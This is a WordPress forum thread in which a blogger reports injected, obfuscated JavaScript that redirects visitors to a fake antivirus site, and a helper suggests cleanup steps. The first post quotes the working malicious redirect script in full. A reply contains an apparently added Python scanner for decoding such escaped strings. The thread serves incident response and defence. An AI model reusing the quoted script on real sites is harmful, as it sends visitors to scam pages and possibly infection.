
[resolved] Hack/malware redirecting to another site (3 posts)

  1. nli
    Member
    Posted 4 years ago #

    I have two WordPress blogs which are under virtual subdomains on the same domain:

    http://aiheet.domnik.net/
    http://lr.domnik.net/

    (both are in Finnish)

    Now in both of them the content is occasionally replaced with malicious JavaScript code that redirects the browser to the fake antivirus site computer-antivirus03.com.

    The content that the script writes over can be the blog home page, an individual post or page, and sometimes even a css style sheet. The script is not always the same, but looks somewhat like this:

    <script type="text/javascript" language="javascript"> var lprcb=new Date( ); lprcb.setTime(lprcb.getTime( )+12*60*60*1000); document.cookie="\x6e\x5f\x73\x65\x73s\x5f\x69d\x3d\x30\x64\x38\x657cba\x65\x64\x63\x39\x61\x34\x35\x371\x61\x62e\x37\x61\x37\x32\x35\x36\x64\x31e\x65\x617"+"\x3b\x20path=/;\x20expire\x73="+lprcb.toGMTString( ); </script>
    <script type="text/javascript" language="javascript"> var iyssffn=new Array("ht\x74\x70://t\x68e-off\x73\x70\x72\x69\x6e\x67\x2e\x63\x6e/\x3f\x70i\x64\x3d1\x38\x30s0\x38\x26s\x69\x64\x3d3c\x357\x37\x39","\x68\x74tp:\x2f\x2f\x74h\x65-o\x66fsp\x72ing.c\x6e\x2f\x3fpi\x64\x3d\x31\x380\x73\x30\x39\x26si\x64\x3d3\x635\x377\x39"); var kumh="\143\x61,co\x2c\144\x61,de,c\x79,el\x2cen,\x65o,e\x73,fi\x2cfr\x2cga\x2ci\x74,j\x61,j\x69,\x6bn\x2cnl\x2cno\x2cpt\x2csv"; var wlmnfsc=navigator.language || navigator.systemLanguage; var lang=wlmnfsc.toLowerCase( ); lang=lang.substr(0,2); if (kumh.indexOf(lang)==-1){zeck( ); }else {eylgnov(omqmeq( )?iyssffn[0]:iyssffn[1]); }function eylgnov(hrnmj){if (top.location.href!=window.location.href){top.location=hrnmj; }else {document.writeln("\x3cM\x45\x54A \x48TTP-EQ\x55IV=47Re\x66res\x6847\x20C\x4fNT\x45N\x54=470;\x20UR\x4c="+hrnmj+"\x27>"); document.writeln("74meta ht\x74\160\x2dequiv\x3d47\x70ra\x67ma\x27 co\x6eten\x74=\x27no\x2dca\x63he\x27>"); document.writeln("\x3cmeta \x6e\141\x6de=47\x72o\x62ots\x27 con\x74en\x74=47noi\x6ede\x78,n\x6ff\x6fll\x6fw\x27>"); }}function zeck( ){eylgnov(omqmeq( )?iyssffn[2]:iyssffn[3]); return; }function omqmeq( ){alert(document.referrer); return document.referrer.indexOf("\x67oo\x67\x6ce.") || document.referrer.indexOf("\x79ahoo.") || document.referrer.indexOf("bi\x6eg."); } </script>

    It doesn't show up every time. Sometimes I have to browse around for a while before I can see it.

    For two more examples (first one is the same as above), see:

    http://www.domnik.net/x/temp/computer-antivirus03.txt

    What have I already done:

    I replaced all the core files in both blogs with brand new ones from a new WordPress download (it was version 2.8.4 already when hacked).

    I examined my template files and didn't find anything suspicious.

    I removed all plugins that I don't use.

    I uploaded plugins Antivirus, WordPress Exploit Scanner and WP Security Scan to see if they find something. I corrected one chmod proposed by WP Security Scan (wp-admin/index.php to chmod 644). It also said "The file .htaccess does not exist in wp-admin/." Should I have one there?

    Exploit Scanner found some suspicious "String.fromCharCode" and "shell_exec" from several files but those seem to exist in clean WordPress files too.

    I have contacted my webhost (I am on shared hosting) and sent them basically the same info. No reply yet.

    I have changed all the passwords (they were randomly generated before and they are still randomly generated).

    I am the only one who has admin rights to the blogs, and for the last few months I have accessed them only from my own computer, which runs Ubuntu. The other blog has one co-blogger, but he has only editor rights.

    Any ideas how to proceed and get rid of the code?

  2. alism
    Member
    Posted 4 years ago #

    I think that there's a good possibility that your host just has security problems, but that's kinda difficult to prove.

    What else can you do then? Hmmm.

    Look through your server logs to see if you can spot anything suspicious.

    Scan any PCs, Macs or other boxes that might be infected with something and potentially snaffling your FTP password (although that's unlikely from what you describe, I think).

    Check for other potentially insecure scripts running in your webspace.

    Look for other scripts/code that a hacker might've left behind as a backdoor (not necessarily hiding in WordPress directories).

    Triple check that you're the only one with Admin rights - does the number at the top of that page say (2), yet WordPress only displays yourself as an admin?

    Lock down your wp-admin directory with a htpasswd/htaccess.

    Errr, look to your host...

    There are some links at the bottom of this page worth reading too:
    http://wordpress.org/support/topic/307660?replies=1
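
    As an added example (not code from this thread, from WordPress or from the plugins named above), the Python script below does by hand what nli's first post and alism's "look for other scripts/code a hacker might've left behind" step describe: it decodes the \xHH and \NNN escapes that the injected script uses to hide its cookie name, language list and redirect URLs, and walks a WordPress tree reporting every file that carries such obfuscated literals (stylesheets included, since the poster saw a CSS file overwritten). The sample text and the example.invalid URL are constructed for the demonstration.

```python
import os
import re
import sys

# JavaScript \xHH and \NNN (octal) escapes hide the cookie name, language
# list and redirect URLs in the injected script.
ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{2})|\\([0-7]{1,3})')
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # double-quoted JS literals

# Constructed sample in the style of the thread's script (placeholder URL, not the real target).
SAMPLE = r'''<script type="text/javascript"> var u=new Array("ht\x74\x70://\x65xa\x6d\x70le.\x69nvalid/\x3fpid\x3d1");
document.cookie="\x6e\x5f\x73ess\x5fid\x3d1;\x20path=/"; var k="\143\x61,fi\x2cen"; </script>'''
def decode_js_escapes(s):
    """Resolve \\xHH and \\NNN escapes; everything else passes through."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return ESCAPE_RE.sub(repl, s)

def find_obfuscated_strings(text, min_escapes=3):
    """Decoded literals built from at least min_escapes escapes. Legitimate
    theme/plugin code rarely writes strings this way, so the count is the signal."""
    return [decode_js_escapes(m.group(1)) for m in STRING_RE.finditer(text)
            if len(ESCAPE_RE.findall(m.group(1))) >= min_escapes]

def extract_urls(decoded):
    """The decoded strings that are URLs, i.e. the redirect targets to block."""
    return [s for s in decoded if s.lower().startswith(("http://", "https://"))]

def scan_tree(root, exts=(".php", ".js", ".html", ".css")):
    """Walk a WordPress install (themes, plugins, uploads and stylesheets
    included) and map each file to the obfuscated strings found in it."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as f:
                    decoded = find_obfuscated_strings(f.read())
            except OSError:  # unreadable file: skip it, keep scanning
                continue
            if decoded:
                hits[path] = decoded
    return hits
if __name__ == "__main__":  # usage: python scan.py /path/to/wordpress
    for path, strings in scan_tree(sys.argv[1]).items():
        print(path, extract_urls(strings) or strings)
```

    Run it against a copy of the web root; the decoded URLs it prints are the ones to report to the host and to compare against server logs.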

  3. nli
    Member
    Posted 4 years ago #

    Thanks alism, you were right. It was a security problem with my host, not a WordPress issue. They have resolved it now.

    Anyway, it was useful to learn something more about WordPress security too. I'll look into securing the wp-admin directory with an .htaccess file and double-check the admin rights.

Topic Closed

This topic has been closed to new replies.
